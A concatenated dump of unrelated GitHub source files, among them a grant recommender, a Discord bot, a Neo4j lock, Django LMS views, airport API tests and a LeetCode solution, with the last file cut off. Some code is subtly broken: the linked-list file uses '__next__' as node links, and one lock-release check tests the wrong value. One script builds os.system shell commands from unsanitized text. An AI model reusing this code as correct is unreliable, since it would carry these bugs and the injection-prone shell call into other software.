pred_df.loc[pred_df['pred_flat'] == 1,:].copy()\n pred_df_keep.reset_index(drop= True, inplace = True)\n \n \n clusters_rec = {}\n for i in clusters: # enumerate key\n cluster_i = {}\n idx = clusters[i]\n temp_pmid = np.take(all_pmids, idx)\n temp_yr = np.take(all_years, idx)\n \n if len(idx)==1:\n #in this case, we only have 1 publication per cluster, no need to consider the year effect\n recom_df = pred_df_keep.loc[pred_df_keep['pmid']==temp_pmid[0],:].copy() \n recom_df.reset_index(drop = True, inplace = True)\n results = recom_df['probas'].sort_values(ascending= False)\n \n \n else:\n #in this case, yes, we need to consider the year effect\n #do separatetly for each pmid, merge and sort\n recom_dfs = []\n for j, pmid in enumerate(temp_pmid):\n df = pred_df_keep.loc[pred_df_keep['pmid']== int(pmid),:].copy() \n df.reset_index(drop = True, inplace = True)\n df['score'] = yearW.calculate_weight(vec = df.probas, publication_year= int(temp_yr[j]))\n #print(df.head())\n recom_dfs.append(df[['rfaid','score']])\n recom_df = reduce(lambda x, y: pd.merge(x, y, on = 'rfaid'), recom_dfs) \n recom_df = pd.DataFrame(recom_df.T.groupby([s.split('_')[0] for s in recom_df.T.index.values]).sum().T, \n columns = ['rfaid', 'score'])\n #print(recom_df.head())\n #print([s.split('_')[0] for s in recom_df.T.index.values])\n results = recom_df['score'].sort_values(ascending= False) \n #print(results)\n \n recom_rfas = np.take(recom_df['rfaid'].tolist(), list(results.index))\n #print(recom_rfas[:10])\n cluster_i['rfa_id'] = recom_rfas[:top] \n #get the titles \n recom_rfa_titles = [rfas.query('funding_opportunity_number==@rfa')['funding_opportunity_title'].values[0]\\\n for rfa in recom_rfas[:top]]\n cluster_i['rfa_title'] = recom_rfa_titles[:top]\n #get the links\n recom_rfa_links = [rfas.query('funding_opportunity_number==@rfa')['link_to_additional_information'].values[0].strip('; ') \\\n for rfa in recom_rfas[:top]]\n cluster_i['rfa_links'] = recom_rfa_links\n recom_rfa_types = [getGrantTypes(link) for link in recom_rfa_links] # a list of lists\n cluster_i['rfa_types'] = recom_rfa_types\n # cluster_i['rfa_link'] = recom_rfa_links[:top] \n # get the grant types, this needs information of the 'link_to_additional_information' and crawl under 'Activity Codes'\n 'view-source:https://grants.nih.gov/grants/guide/rfa-files/RFA-DK-19-501.html'\n # get the purpose\n recom_rfa_desc = [rfas.query('funding_opportunity_number==@rfa')['description'].values[0] for rfa in recom_rfas[:top]]\n cluster_i['rfa_purpose'] = recom_rfa_desc#[:top]\n # get the dates \n recom_rfa_releases = [rfas.query('funding_opportunity_number==@rfa')['posted_date'].values[0].strip() for \\\n rfa in recom_rfas[:top]]\n cluster_i['rfa_releaseDate'] = recom_rfa_releases#[:top]\n recom_rfa_exps = [rfas.query('funding_opportunity_number==@rfa')['current_closing_date_for_applications'].values[0].strip() \\\n for rfa in recom_rfas[:top]]\n cluster_i['rfa_ExpireDate'] = recom_rfa_exps#[:top]\n # repeat the column name as dictionary key, so each cluster has a list of same-structured dictionary as results \n clusters_rec['cluster'+str(i)] = list(pd.DataFrame.from_dict(cluster_i).T.to_dict().values())\n # write the results\n if m_name.strip() =='':\n name = f_name + '_' + l_name \n else:\n name = f_name + '_' + m_name + '_' + l_name \n logger.error('{}: total {} clusters, recommended {} rfas per cluster'.format(name, len(clusters), top)) \n logging.shutdown()\n for handler in logger.handlers:\n if isinstance(handler, logging.FileHandler):\n handler.close() \n with open(out_path + name + '_clusteredRes.json', 'w') as f:\n json.dump(clusters_rec, f)\n \n # combine results \n mergeRes(pathTilName = out_path + name)\n renameRes(file = out_path + name)\n \n return clusters_rec\n \n\n\n\n","repo_name":"ashraf-yaseen/VRA","sub_path":"grants_rec/service/utils_bert_service.py","file_name":"utils_bert_service.py","file_ext":"py","file_size_in_byte":37870,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"10821494795","text":"import re\nimport sys\nimport os\n\ndef makepic(text,colour,longword):\n\n infile = 'bang.svg'\n outfile = 'outfile.svg'\n print(text)\n with open(infile) as file: # Use file to refer to the file object\n data = file.readlines()\n\n with open(outfile,'w') as ofile:\n \n for line in data:\n line = re.sub('FOO',text,line.rstrip())\n line = re.sub('#0000ff',colour,line.rstrip())\n if longword==True:\n line = re.sub(\"font-size=\\\"16\\\"\",\"font-size=\\\"10\\\"\",line.rstrip())\n \n ofile.write(line)\n \n os.system('inkscape -z outfile.svg -e outfile_'+text+'.png')\n os.system('rm '+outfile)\n\n#makepic(\"longwords\",'',True)\n","repo_name":"opensourcegrappler/ComicBoomBot","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70477693921","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from .Cogs.polls_cog import Poll\n\n from nextcord import Member\n\nimport asyncio\nfrom time import time\n\nfrom nextcord import Intents\nfrom nextcord.ext import commands\n\ntry:\n from .config import prefix, FEEDBACK_CHANNEL\nexcept:\n from .config_example import prefix, FEEDBACK_CHANNEL\n\nclass StoreBot(commands.Bot):\n def __init__(self) -> None:\n intents: Intents = Intents.all()\n intents.presences = False\n super().__init__(\n command_prefix=commands.when_mentioned_or(prefix),\n case_insensitive=True,\n intents=intents,\n help_command=None\n )\n\n self.bot_added_roles_lock: asyncio.Lock = asyncio.Lock()\n self.bot_added_roles_queue: asyncio.Queue[int] = asyncio.Queue()\n\n self.bot_removed_roles_lock: asyncio.Lock = asyncio.Lock()\n self.bot_removed_roles_queue: asyncio.Queue[int] = asyncio.Queue()\n \n self.statistic_lock: asyncio.Lock = asyncio.Lock()\n self.bot_feedback_channel: int = FEEDBACK_CHANNEL\n self.current_polls: list[Poll] = []\n \n self.text_lock: asyncio.Lock = asyncio.Lock()\n # guild_id: {text_channel_id}\n self.ignored_text_channels: dict[int, set[int]] = {}\n\n self.voice_lock: asyncio.Lock = asyncio.Lock()\n self.startup_time: int = int(time())\n # guild_id: member_id: Member\n self.members_in_voice: dict[int, dict[int, Member]] = {}\n # guild_id: {voice_channel_id}\n self.ignored_voice_channels: dict[int, set[int]] = {}\n\n self.member_join_remove_lock: asyncio.Lock = asyncio.Lock()\n # guild_id: channel_id\n self.join_remove_message_channels: dict[int, int] = {}\n\n # Dummy listener.\n async def on_application_command_error(*args) -> None:\n return\n","repo_name":"i80287/studpid-bot","sub_path":"storebot/storebot.py","file_name":"storebot.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30292330870","text":"import contextlib\nimport logging\n\nfrom cloud_snitch.models import EnvironmentLockEntity\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass EnvironmentLock:\n \"\"\"Simple class for locking an environment.\"\"\"\n def __init__(self, driver, account_number, name):\n \"\"\"Init the lock\n\n :param driver: Instance of driver\n :type driver: neo4j.v1.GraphDatabase.driver\n :param account_number: Environment account number\n :type account_number: str\n :param name: Environment name\n :type name: str\n \"\"\"\n self.driver = driver\n self.account_number = account_number\n self.name = name\n\n # When key is 0, the lock is open\n self.key = 0\n\n def lock(self):\n \"\"\"Lock the environment.\n\n Calls the entity lock method.\n Saves the key for unlocking the environment later.\n \"\"\"\n with self.driver.session() as session:\n self.key = EnvironmentLockEntity.lock(\n session,\n self.account_number,\n self.name\n )\n\n @property\n def locked(self):\n \"\"\"Return whether or not the lock is locked.\n\n :returns: True for locked, False otherwise\n :rtype: bool\n \"\"\"\n return self.key != 0\n\n def release(self):\n \"\"\"Releases the lock.\n\n No action is taken if the lock is open\n \"\"\"\n # Return early if not locked\n if self.key is None:\n return\n\n # Call entity release method\n with self.driver.session() as session:\n released = EnvironmentLockEntity.release(\n session,\n self.account_number,\n self.name, self.key\n )\n\n if released:\n self.key = 0\n else:\n logger.warning(\n 'Unable to release lock with key: {}'.format(self.key)\n )\n\n\n@contextlib.contextmanager\ndef lock_environment(driver, run):\n \"\"\"Lock an environment\n\n Prevents multiple sync instances from updating a single environment\n at the same time.\n\n :param driver: Driver instance\n :type driver: neo4j.v1.GraphDatabase.driver\n :param run: Collection run data structure.\n :type run: cloud_snitch.run.Run\n :yields: The environment lock object\n :ytype: Environment\n \"\"\"\n # Start the lock object\n lock = EnvironmentLock(\n driver,\n run.environment_account_number,\n run.environment_name\n )\n try:\n # Obtain the lock\n lock.lock()\n logger.debug(\"Obtained lock on {}: {}\".format(\n lock.account_number,\n lock.key\n ))\n yield lock\n finally:\n # Attempt to release the lock\n if lock.locked:\n lock.release()\n logger.debug(\"Released lock on {}: {}\".format(\n lock.account_number,\n lock.name)\n )\n","repo_name":"absalon-james/cloud_snitch","sub_path":"cloud_snitch/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71913701603","text":"from datetime import datetime\nimport threading\nimport wave\nfrom time import strftime\n\nimport pyaudio\n\n\nclass Recording:\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n RATE = 44100\n RECORD_SECONDS = 5\n WAVE_OUTPUT_FILENAME = \"record\"\n\n def __init__(self, label):\n self.lock = threading.Lock()\n self.frames = []\n self.label = label\n\n def start(self, seconds):\n self.RECORD_SECONDS = seconds\n try:\n print(\"* recording\")\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK)\n except:\n return \"Запись невозможна. Микрофон не обнаружен. Проверьте работу микрофона и перезапустите приложение.\"\n\n for i in range(0, int(self.RATE / self.CHUNK * self.RECORD_SECONDS)):\n data = self.stream.read(self.CHUNK)\n self.frames.append(data)\n self.label.update(int(i / self.RATE * self.CHUNK))\n\n print(\"* done recording\")\n\n self.stream.stop_stream()\n self.stream.close()\n self.p.terminate()\n\n wf = wave.open(str(self.WAVE_OUTPUT_FILENAME) + \"_\" + strftime(\"%Y_%m_%d_%H_%M_%S\") + \".wav\", 'wb')\n wf.setnchannels(self.CHANNELS)\n wf.setsampwidth(self.p.get_sample_size(self.FORMAT))\n wf.setframerate(self.RATE)\n wf.writeframes(b''.join(self.frames))\n wf.close()\n\n\n\n","repo_name":"BuzunovViktor/EGEaudioRec","sub_path":"src/Recording.py","file_name":"Recording.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15612699521","text":"\n\n# V1 \nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __repr__(self):\n if self:\n return \"{} -> {}\".format(self.val, repr(self.__next__))\n\nclass Solution(object):\n # @param head, a ListNode\n # @param x, an integer\n # @return a ListNode\n def partition(self, head, x):\n left = []\n right = []\n cur = head \n while cur:\n if cur.val < x:\n left.append(cur.val)\n else:\n right.append(cur.val)\n\n cur = cur.__next__ \n return left + right \n\n# V2 \n# Time: O(n)\n# Space: O(1)\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __repr__(self):\n if self:\n return \"{} -> {}\".format(self.val, repr(self.__next__))\n\nclass Solution(object):\n # @param head, a ListNode\n # @param x, an integer\n # @return a ListNode\n def partition(self, head, x):\n dummySmaller, dummyGreater = ListNode(-1), ListNode(-1)\n smaller, greater = dummySmaller, dummyGreater\n\n while head:\n if head.val < x:\n smaller.next = head\n smaller = smaller.__next__\n else:\n greater.next = head\n greater = greater.__next__\n head = head.__next__\n\n smaller.next = dummyGreater.__next__\n greater.next = None\n\n return dummySmaller.__next__\n\n\n\n","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Two_Pointers/partition-list.py","file_name":"partition-list.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"17418012385","text":"\n# 学生信息列表数组\n#\n# 1。查询所有的学生信息\n# 2。搜索学生信息\n# 3。增加学生信息\n# 4。修改学生信息\n# 5。删除学生信息\n# 6。退出系统\n#\n\nstudent_list =[]\n\ndef user_list():\n print('1.查询所有的学生信息')\n print('2.搜索学生信息')\n print('3.增加学生信息')\n print('4.修改学生信息')\n print('5.删除学生信息')\n print('6.退出系统')\n user_input = input('输入选择的')\n return user_input\n\ndef inquire_list():\n for user in student_list:\n print(user)\n\ndef search_list():\n iput = input('输入搜索学生姓名')\n flage = False\n for user in student_list:\n if user['name'] == iput:\n flage = True\n print(user)\n if not flage:\n print('没有搜索到学生')\n\ndef add_list():\n user_name = input('输入姓名')\n user_age = input('输入年龄')\n user_num = input('输入学号')\n student_list.append({'name':user_name,'age':user_age,'num':user_num})\n print('学生{}添加成功'.format(user_name))\n\ndef modify_list():\n iput = input('输入修改学生姓名')\n flage = False\n for user in student_list:\n if user['name'] == iput:\n flage = True\n user['name'] = input('输入修改学生姓名')\n user['age'] = input('输入修改学生年龄')\n user['num'] = input('输入修改学生学号')\n print('修改{}成功'.format(iput))\n if not flage:\n print('没有{}学生'.format(iput))\n\ndef remove_lsit():\n iput = input('输入删除学生姓名')\n flage = False\n for user in student_list:\n if user['name'] == iput:\n flage = True\n student_list.remove(user)\n print('删除{}成功'.format(iput))\n if not flage:\n print('没有{}学生'.format(iput))\n\ndef main():\n while True:\n user = user_list()\n if user in ['1','2','3','4','5','6']:\n if user == '1':\n inquire_list()\n elif user == '2':\n search_list()\n elif user == '3':\n add_list()\n elif user == '4':\n modify_list()\n elif user == '5':\n remove_lsit()\n else:\n print('再见')\n break\n\n\nif __name__ == '__main__':\n main()","repo_name":"lzs1314/pythonWeb","sub_path":"week1/学生管理系统.py","file_name":"学生管理系统.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38846727108","text":"import os\nimport cv2\n\n\nvideo_folder_path = \"videos\" # Folders to load videos and store frames\ndata_folder_path = \"data\"\n\nif not os.path.isdir(data_folder_path): # Creates data folder if there is none\n os.mkdir(data_folder_path)\n\nos.chdir(data_folder_path)\n\nvid = 0\nfor file in os.listdir(\"../\" + video_folder_path): # Loops through videos\n if file[0] == \".\":\n continue\n\n file_path = \"../\" + video_folder_path + \"/\" + file\n\n cap = cv2.VideoCapture(file_path)\n\n i = 0\n\n while(cap.isOpened()): # Saves every 100th frame in data folder\n ret, frame = cap.read()\n if ret == False:\n break\n if i%100==0:\n cv2.imwrite('video' + str(vid) + 'img'+str(i)+'.jpg',frame)\n print(f\"Img number {i} written.\")\n i+=1\n vid += 1\n\n cap.release()\n cv2.destroyAllWindows()\n","repo_name":"markushector/bjj-project","sub_path":"data/image_processing/video_to_frame.py","file_name":"video_to_frame.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7495697151","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport argparse\n\ndef main(args):\n\n folderdir = args.folderdir\n slab = args.slab\n date = args.date\n cint = args.cint\n \n folder = '%s_slab2_%s'%(slab,date)\n supplement = pd.read_csv('%s/%s_slab2_sup_%s.csv'%(folderdir,slab,date))\n \n os.system(\"rm %s/%s_slab2_c%i_%s.txt\"%(folderdir,slab,cint,date))\n contourlist = np.arange(100,700,cint)\n depthlist = np.array(list((set(supplement.depth))))\n with open('%s/%s_slab2_c%i_%s.txt'%(folderdir,slab,cint,date),'a') as f:\n for c in contourlist:\n distdepths = np.abs(c-depthlist)\n supdep = depthlist[np.argmin(distdepths)]\n dat = supplement[supplement.depth == supdep]\n if len(dat) > 0:\n if slab == 'izu' or slab == 'man' or slab == 'ker':\n dat = dat.sort_values(by=['lat'], ascending=False)\n if slab == 'sol' or slab == 'hin' or slab == 'pam':\n dat = dat.sort_values(by=['lon'], ascending=False)\n f.write('> %i \\n'%c)\n dat = dat[['lon','lat']]\n dat.to_csv(f,header=False,index=False,sep=' ')\n\n\n# Help/description and command line argument parser\nif __name__=='__main__':\n desc = '''\n Expects slab (-s), model-date(-d), path to output folder(-f)\n '''\n parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawDescriptionHelpFormatter)\n \n parser.add_argument('-s', '--slab', dest='slab', type=str,\n required=True, help='three letter slab code')\n parser.add_argument('-d', '--date', dest='date', type=str,\n required=True, help='date for model (MM.DD.YY)')\n parser.add_argument('-f', '--folderdir', dest='folderdir', type=str,\n required=True, help='directory/to/[slab]_slab2_[date] folder')\n parser.add_argument('-i', '--cint', dest='cint', type=int,\n required=True, help='contour interval (km)')\n\n pargs = parser.parse_args()\n \n #cProfile.run('main(pargs)')\n main(pargs)\n","repo_name":"ginevmoore/Slab2","sub_path":"makecontours.py","file_name":"makecontours.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21962417686","text":"\n\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import CreateView, TemplateView, ListView\nfrom .. import forms\nfrom django.template.loader import render_to_string\nfrom accounts.models import User\nfrom django.http import JsonResponse, Http404\nfrom django.contrib.auth.models import Group\nfrom django.views.generic.edit import FormMixin\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom .. models import Course\nfrom django.core.exceptions import PermissionDenied\n\n\nclass TestLMSAdmin(UserPassesTestMixin):\n \n def test_func(self):\n if not self.request.user.is_authenticated:\n # This will redirect to the 403 page\n raise PermissionDenied\n if not self.request.user.groups.filter(name='Admin Role').exists():\n # Redirect the user to 403 page\n raise PermissionDenied\n return self.dispatch\n\n\nclass ChoiceList(TestLMSAdmin, ListView):\n\n def get_context_object_name(self, object_list):\n object_name = self.kwargs['choice']\n return object_name\n\n def get_queryset(self):\n choice = self.kwargs['choice']\n user_type = {\n 'lms_admins': 'LA',\n 'instructors': 'IN',\n 'students': 'ST',\n }\n if choice in user_type:\n queryset = User.objects.filter(user_type=user_type[choice])\n\n elif choice == 'courses':\n queryset = Course.objects.all()\n else:\n raise Http404\n\n return queryset\n\n def get_template_names(self):\n template = {\n 'lms_admins': r'classroom/lms_admin/lms_admins.html',\n 'instructors': r'classroom/lms_admin/instructors.html',\n 'students': r'classroom/lms_admin/students.html',\n 'courses': r'classroom/lms_admin/courses.html',\n }[self.kwargs['choice']]\n return [template]\n\n\n# view used to handle creation of lms_admin, instructors, students, courses\nclass SignUpView(TestLMSAdmin, CreateView):\n info = dict()\n model = User\n\n def get_form(self, form_class=None):\n choice = self.kwargs['choice']\n form = {\n 'admin': forms.LMSAdminSignUpForm,\n 'instructor': forms.InstructorSignUpForm,\n 'student': forms.StudentSignUpForm,\n 'course': forms.CourseForm,\n }[choice]\n return form(**self.get_form_kwargs())\n\n def get(self, request, *args, **kwargs):\n choice = self.kwargs['choice']\n form = self.get_form()\n path = request.META.get('PATH_INFO')\n context = {'form': form, 'choice': choice.title(), 'path': path}\n self.info['html_form'] = render_to_string(\n 'classroom/includes/new_form_modal.html', context)\n return JsonResponse(self.info)\n\n def form_valid(self, form):\n form.save()\n self.info['valid'] = True\n return JsonResponse(self.info)\n\n def form_invalid(self, form):\n path = self.request.META.get('PATH_INFO')\n context = {'form': form,\n 'choice': self.kwargs['choice'].title(), 'path': path}\n self.info['valid'] = False\n self.info['html_form'] = render_to_string(\n 'classroom/includes/new_form_modal.html', context)\n return JsonResponse(self.info)\n","repo_name":"Akohrr/Learning-Management-System","sub_path":"classroom/views/lms_admin.py","file_name":"lms_admin.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"23122948122","text":"from unittest.mock import patch\n\nfrom django.test import TestCase, override_settings\n\nfrom rest_framework.test import APIClient\n\nfrom airport.models import Aircraft, StateChangeLog\n\n\ndef create_aircraft(call_sign, state='PARKED', type='AIRLINER', longitude=0,\n latitude=0, altitude=0, heading=0):\n return Aircraft.objects.create(\n call_sign=call_sign,\n state=state,\n type=type,\n longitude=longitude,\n latitude=latitude,\n altitude=altitude,\n heading=heading\n )\n\n\nclass StateChangeLogTests(TestCase):\n\n def setUp(self):\n self.client = APIClient()\n self.patcher = patch('airport.permissions.IsValidPublicKey.has_permission')\n self.public_key_is_valid = self.patcher.start()\n self.public_key_is_valid.return_value = True\n\n def tearDown(self):\n self.patcher.stop()\n\n ########################################\n # TESTS FOR ACCEPTED STATE CHANGE LOGS #\n ########################################\n\n def test_known_aircraft_from_PARKED_to_TAKE_OFF_accepted_log(self):\n aircraft = create_aircraft('CS123', state='PARKED')\n\n payload = {\n 'state': 'TAKE_OFF',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'TAKE_OFF', 'ACCEPTED')\n\n def test_known_aircraft_from_TAKE_OFF_to_AIRBORNE_accepted_log(self):\n aircraft = create_aircraft('CS123', state='TAKE_OFF')\n\n payload = {\n 'state': 'AIRBORNE',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'TAKE_OFF', 'AIRBORNE', 'ACCEPTED')\n\n def test_known_aircraft_from_AIRBORNE_to_APPROACH_accepted_log(self):\n aircraft = create_aircraft('CS123', state='AIRBORNE')\n\n payload = {\n 'state': 'APPROACH',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'AIRBORNE', 'APPROACH', 'ACCEPTED')\n\n def test_known_aircraft_from_APPROACH_to_LANDED_accepted_log(self):\n aircraft = create_aircraft('CS123', state='APPROACH')\n\n payload = {\n 'state': 'LANDED',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'APPROACH', 'LANDED', 'ACCEPTED')\n\n ########################################\n # TESTS FOR REJECTED STATE CHANGE LOGS #\n ########################################\n\n def test_know_aircraft_invalid_state_change_from_PARKED_rejected_log(self):\n aircraft = create_aircraft(call_sign='AB1234', state='PARKED')\n payload = {\n 'state': 'APPROACH',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'APPROACH', 'REJECTED')\n\n def test_know_aircraft_invalid_state_change_from_TAKE_OFF_rejected_log(self):\n aircraft = create_aircraft(call_sign='NC9574', state='TAKE_OFF')\n payload = {\n 'state': 'LANDED',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'TAKE_OFF', 'LANDED', 'REJECTED')\n\n #######################################\n # FAILURES DUE TO AIRPORT CONSTRAINTS #\n #######################################\n\n @override_settings(AIRPORT_RUNAWAYS=1)\n def test_runaway_take_rejected_log(self):\n create_aircraft(call_sign='A1', state='TAKE_OFF')\n aircraft = create_aircraft(call_sign='A2', state='PARKED')\n\n payload = {\n 'state': 'TAKE_OFF',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'TAKE_OFF', 'REJECTED')\n\n @override_settings(AIRPORT_RUNAWAYS=1)\n def test_runaway_taken_APPROACH_to_LAND_rejected_log(self):\n create_aircraft(call_sign='A1', state='TAKE_OFF')\n aircraft = create_aircraft(call_sign='A2', state='APPROACH')\n\n payload = {\n 'state': 'LANDED',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'APPROACH', 'LANDED', 'REJECTED')\n\n def test_APPROACH_when_other_is_already_APPROACH_reject_log(self):\n create_aircraft(call_sign='A1', state='APPROACH')\n aircraft = create_aircraft(call_sign='A2', state='AIRBORNE')\n\n payload = {\n 'state': 'APPROACH',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'AIRBORNE', 'APPROACH', 'REJECTED')\n\n @override_settings(AIRPORT_LARGE_PARKING_SPOTS=3)\n def test_LANDED_when_no_parking_available_reject_log(self):\n create_aircraft(call_sign='cs1', state='PARKED', type='AIRLINER')\n create_aircraft(call_sign='cs2', state='PARKED', type='AIRLINER')\n create_aircraft(call_sign='cs3', state='PARKED', type='AIRLINER')\n\n aircraft = create_aircraft('CALL_123', state='APPROACH', type='AIRLINER')\n\n payload = {\n 'state': 'LANDED',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'APPROACH', 'LANDED', 'REJECTED')\n\n #####################\n # CUSTOM ASSERTIONS #\n #####################\n\n def test_new_aircraft_added_success_log(self):\n CALL_SIGN = 'MK2408'\n payload = {\n 'type': 'AIRLINER',\n 'state': 'PARKED',\n 'intent': 'TAKE_OFF',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{CALL_SIGN}/intent/', payload)\n\n aircraft = Aircraft.objects.first() # aircraft should be created\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'TAKE_OFF', 'ACCEPTED')\n\n #####################\n # CUSTOM ASSERTIONS #\n #####################\n\n def assertLog(self, log, expected_aircraft, expected_from_state, expected_to_state, expected_outcome):\n self.assertEqual(log.aircraft, expected_aircraft)\n self.assertEqual(log.from_state, expected_from_state)\n self.assertEqual(log.to_state, expected_to_state)\n self.assertEqual(log.outcome, expected_outcome)\n","repo_name":"milorad-kukic/airport","sub_path":"app/airport/tests/test_state_change_logs.py","file_name":"test_state_change_logs.py","file_ext":"py","file_size_in_byte":7961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74382364641","text":"from sqlalchemy import (\n Column,\n Integer,\n String\n)\n\nfrom sqlalchemy.orm import relationship\nfrom config_db import Base\n\n\nclass Genre(Base):\n \"\"\"\n Genre Model\n \"\"\"\n\n __tablename__ = 'genres'\n\n GenreId = Column(\n Integer,\n primary_key=True\n )\n\n Name = Column(\n String(120)\n )\n\n Tracks = relationship(\n 'Track',\n back_populates='Genre',\n lazy='joined',\n )\n","repo_name":"Carlososuna11/Vinyl-Store","sub_path":"models/genre.py","file_name":"genre.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16167060171","text":"import logging\nimport sys\nimport os\nimport shutil\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom realtimelosstools.configuration import Configuration\nfrom realtimelosstools.rla import RapidLossAssessment\nfrom realtimelosstools.ruptures import RLA_Ruptures\nfrom realtimelosstools.oelf import OperationalEarthquakeLossForecasting\nfrom realtimelosstools.stochastic_rupture_generator import StochasticRuptureSet\nfrom realtimelosstools.exposure_updater import ExposureUpdater\nfrom realtimelosstools.losses import Losses\nfrom realtimelosstools.postprocessor import PostProcessor\nfrom realtimelosstools.utils import Files, Loader\nfrom realtimelosstools.writers import Writer\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogger.addHandler(logging.StreamHandler(sys.stdout))\n\nlog_summary = []\n\n\ndef main():\n \"\"\"Run the programme.\"\"\"\n\n # Log the start of the run\n logger.info(\"Real-Time Loss Tools has started\")\n\n # Read configuration parameters\n config = Configuration(\"config.yml\")\n if config.state_dependent_fragilities:\n state_dependent_message = \"Running with state-dependent fragility models\"\n else:\n state_dependent_message = \"Running with state-independent fragility models\"\n logger.info(state_dependent_message)\n\n # Log relevant summary parameters (to create log file that allows\n # for a quick check of correct input)\n log_summary.append(\"Real-Time Loss Tools has started\")\n log_summary.append(\"General description: %s\" % (config.description_general))\n log_summary.append(state_dependent_message)\n log_summary.append(\"%s is path in config file\" % (config.main_path))\n log_summary.append(\"%s is current path\" % (os.getcwd()))\n\n state_dep = Files.find_string_in_file(\n os.path.join(config.main_path, \"current\", \"job.ini\"), \"state_dependent\"\n )\n log_summary.append(\"State dependent: %s\" %(state_dep))\n\n # If 'exposure_model_current.csv' already exists, code cannot run (the 'main_path' indicated\n # in the configuration file may refer to a directory from a previous run that the user may\n # not want to overwrite)\n if os.path.isfile(\n os.path.join(config.main_path, \"current\", \"exposure_model_current.csv\")\n ):\n error_message = (\n \"File 'exposure_model_current.csv' already exists under 